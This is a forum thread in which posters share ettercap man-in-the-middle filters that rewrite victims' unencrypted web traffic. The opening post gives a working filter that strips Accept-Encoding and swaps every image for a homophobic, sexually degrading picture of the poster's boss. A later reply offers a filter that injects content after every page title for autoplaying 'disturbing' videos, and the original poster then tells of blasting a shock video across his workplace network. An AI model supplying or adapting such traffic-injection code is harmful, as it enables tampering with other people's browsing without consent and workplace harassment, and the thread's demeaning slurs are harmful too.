Results 1 to 6 of 6

Thread: ettercap filter - replace every img in victim brower

  1. #1
    Member imported_onryo's Avatar
    Join Date
    Apr 2009
    Posts
    109

    Default ettercap filter - replace every img in victim brower

    This ettercap filter should inject (replace) every img that the victim (boss) sees in his browser. Example every picture on cnn.com will be a PhotoShoped picture of my boss having queer sex in a gimp latex suit. I have compiled it like this:

    etterfilter gimp.filter -o gimpsex.ef

    and all looks good. The URL is not the real one here.
    if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
    replace("Accept-Encoding", "Accept-Rubbish!");
    # note: replacement string is same length as original string
    msg("zapped Accept-Encoding!\n");
    }
    }
    if (ip.proto == TCP && tcp.src == 80) {
    replace("img src=", "img src=\"http://www.*****.com/images/lars_is_gay.png\" ");
    replace("IMG SRC=", "img src=\"http://www.******.com/images/lars_is_gay.png\" ");
    msg("Filter Ran.\n");
    }
    OK so I can see the zapp'n but I don't hear any screams from his office. Whats up?

    onryo
    Let me explain officer, I am not a hacker. I am a security tester of sorts!

  2. #2
    Senior Member streaker69's Avatar
    Join Date
    Jan 2010
    Location
    Virginville, BlueBall, Bird In Hand, Intercourse, Paradise, PA
    Posts
    3,535

    Default

    OK so I can see the zapp'n but I don't hear any screams from his office. Whats up?
    He's probably busy contacting HR and filling out your termination papers.
    A third party security audit is the IT equivalent of a colonoscopy. It's long, intrusive, very uncomfortable, and when it's done, you'll have seen things you really didn't want to see, and you'll never forget that you've had one.

  3. #3
    Member imported_onryo's Avatar
    Join Date
    Apr 2009
    Posts
    109

    Default

    lol, He has a sense of humor and likes to play "war games". Would have been worse if I had ettercap // //. There is nothing more or less wrong with the filter. Turns out that all the real pictures that were cached were being reloaded. He got me back by making a 15 sec splash screen from the movie " Deliverance " .... you know the squeal for me part.

    The reason I said more or less was some img files that are not cached are sneaking by. Thought it was a browser thing. Turns out this is not the case. Any ideas ?
    Let me explain officer, I am not a hacker. I am a security tester of sorts!

  4. #4
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213

    Default

    I have had alot of fun with ettercap and filters... i would put a video at the top of every page that will auto play...

    Code:
    if (ip.proto == TCP && tcp.dst == 80) {
        if (search(DATA.data, "Accept-Encoding")) {
               replace("Accept-Encoding", "Accept-Nothing!");
          }
    }
    
    if (ip.proto == TCP && tcp.src == 80) {
          if (search(DATA.data, "<title>")) {
               replace("<title>", "</title> Put what you want here");
               msg("script injected");
          }}
    go ahead and test that... your only limited by your own imagination at this point...

    I had a vary disturbing video auto play every time the user loads a page... im not going to post this source because i dont think these mods would like it... send me a pm and ill give you the source... or just play around with the source i provide...

  5. #5
    Member imported_onryo's Avatar
    Join Date
    Apr 2009
    Posts
    109

    Default

    Quote Originally Posted by BigMac View Post
    I have had alot of fun with ettercap and filters... i would put a video at the top of every page that will auto play...

    Code:
    if (ip.proto == TCP && tcp.dst == 80) {
        if (search(DATA.data, "Accept-Encoding")) {
               replace("Accept-Encoding", "Accept-Nothing!");
          }
    }
    
    if (ip.proto == TCP && tcp.src == 80) {
          if (search(DATA.data, "<title>")) {
               replace("<title>", "</title> Put what you want here");
               msg("script injected");
          }}
    go ahead and test that... your only limited by your own imagination at this point...

    I had a vary disturbing video auto play every time the user loads a page... im not going to post this source because i dont think these mods would like it... send me a pm and ill give you the source... or just play around with the source i provide...
    Good stuff BigMac!
    Had the grand finale Tubgirl video scene "blast" my work network using // // right after lunch Polly works better then wpa2 to keep ppl off your home AP. Just leave it opn one night.

    Thx for the code.

    onryo.
    Let me explain officer, I am not a hacker. I am a security tester of sorts!

  6. #6
    Junior Member
    Join Date
    Apr 2009
    Posts
    43

    Default

    If you want more examples check out the directory containing ettercap
    It actually has example filter files there showing a wide variety of things

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •